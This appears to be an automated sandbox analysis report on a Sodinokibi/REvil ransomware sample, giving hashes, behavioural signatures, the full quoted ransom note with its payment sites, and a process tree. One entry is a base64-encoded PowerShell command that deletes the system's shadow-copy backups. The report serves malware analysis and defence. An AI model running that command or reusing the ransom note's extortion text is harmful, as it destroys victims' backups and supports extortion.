Analysis

  • max time kernel
    126s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    20-07-2020 18:46

General

  • Target

    fcb9ba05f921f7af41dba56b278c39715a8631c27048c70d098574e7ec20db22.bin.exe

  • Size

    166KB

  • MD5

    9c21e23a91e0488d8df5e65b5d29a2fe

  • SHA1

    f032814f2e072178a0c20d7500c2e1e4352aca39

  • SHA256

    fcb9ba05f921f7af41dba56b278c39715a8631c27048c70d098574e7ec20db22

  • SHA512

    6a9008181203b1d02e62256c62d41e6788caf16b60977ff796bff8b4c42efc815b092082ee99d92d459c54f3b6e440ecfa16d5bfff9a63aa099f48ba20fc53b1

Malware Config

Extracted

Path

C:\3z0k6i-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 3z0k6i. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C2A8A4171253212B 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/C2A8A4171253212B Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: o/tihtdrhzaQcaeIWOXXJ6FUxsN026k76mK6Rp0rpNxT3HUtD5cgZSLqaq8znKx9 NjhRsnmeofOKpWWeXeMrZsz1eXm/es8CkKT1+kFZoAY/kXT2Zvs4DvTIBwpw9COy LXVKvcimJT/FAH53GGLFkuozbf/eQ7Z11Ugy7+IP8mhb/Au4rKQjje85lJ+2DDba Ihe0wucShyna4qe8K66vuEzwOTpLuEVc1UChpBqudWDEqU47qmP27rCh0GzFIu79 9Fk3l9p6o6IOtuHlXmJ31HTGVM1IfR5r9wv8tx4tQXuNZoiXvRR/J1KVqs6fAgOT V9wM0DCwGGN3Lm0nrDOKYz49pgXpXxDc9Al8O99PIdjIkbsuxujDWkZj89PObBs+ uJH9r+03/tedlUY8CTFxgIA25e5cLWOl3gwIhMF+G70Ja9D5rLrEx/sBPH5iqnxK Q14t5dNoXSlnMWOqGqzdxdg9R+2gWU2drAkAh5bHdF4eIhegxDJWk37V9UKYVHwe 4mpblY/bc8dF1ohEfKpvlKzEcIZ2MbFOzADQQ05mjjTUdnxbohjRb2MdFelv/by3 bqo1HB/+5p6LNM1qW3h2+Rev1oNhkSqp9qAnkemiAjVB4LvT2evuPSe351whArSw rXF3xoWk3/m+im+YoVixMwb7Yb69DpZnsp9jeNzh78VIf7Ci3pR1W7kL/YNcdwI0 1biTD7uhX6yFGnVkwkJ4X0b7ZsIp/1zlWG3OtYfxV28olaJ7D7/V1pc06yzFx1VQ lpg8QXFsdNC8OVb+loNLRZwXwOXp6rREbUFaQLviXmeiSOV5TRNRBZlhbKxVmKbr c9BWnuB8qC8FawTHB7/+62ix0azjJeIj2SkMWy/w+oAbwCiS/349mFTKDaExckaI kRXaUV3Sc5V2xb4PbcffZ1WDyXCuXMj/d+meHIS4a6qovkFDMVHy1uWz7vBRN8jp oakKJgEk0NRico4Nij7dTd5kj96Va9/WMs7YWqJ1AJMaFCkzWuXJJLR/AO8kB58V thQzvgwOVmLIoJI2fwipnryYdCQ3SdQlmUiYXVts8/kZZe2KOLVEEXlaxolRiwlr RHqu8T8sBb+McM8P8FEfyvCCMhSHkA8UeJBrTSpAnhRPDeXW814qK5W4AWvGgW3Z /vJgxfZzHqVmGtiRRCKZvNvAql5iwm4tufbSYiLN8pIApNzujjWXOikQv/Hkqmi/ HKgcVW6lGf4SaBZGBEPGsFh9uIPIwLZtbZbNhwqLL9oimz1X79eNuzy6/CM1Fhnw wVib1Hx+p8hL5NcIb9wmkqWGoCAJ9zinIPOIRBBqVMI= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C2A8A4171253212B

http://decryptor.cc/C2A8A4171253212B

Signatures

  • Suspicious use of WriteProcessMemory 4 IoCs
  • Drops file in Program Files directory 22 IoCs
  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies service 2 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fcb9ba05f921f7af41dba56b278c39715a8631c27048c70d098574e7ec20db22.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\fcb9ba05f921f7af41dba56b278c39715a8631c27048c70d098574e7ec20db22.bin.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Drops file in Program Files directory
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Sets desktop wallpaper using registry
    • Modifies system certificate store
    • Adds Run key to start application
    PID:1492
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:1016
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1112
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Modifies service
      • Suspicious use of AdjustPrivilegeToken
      PID:1872

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1016-0-0x0000000000000000-mapping.dmp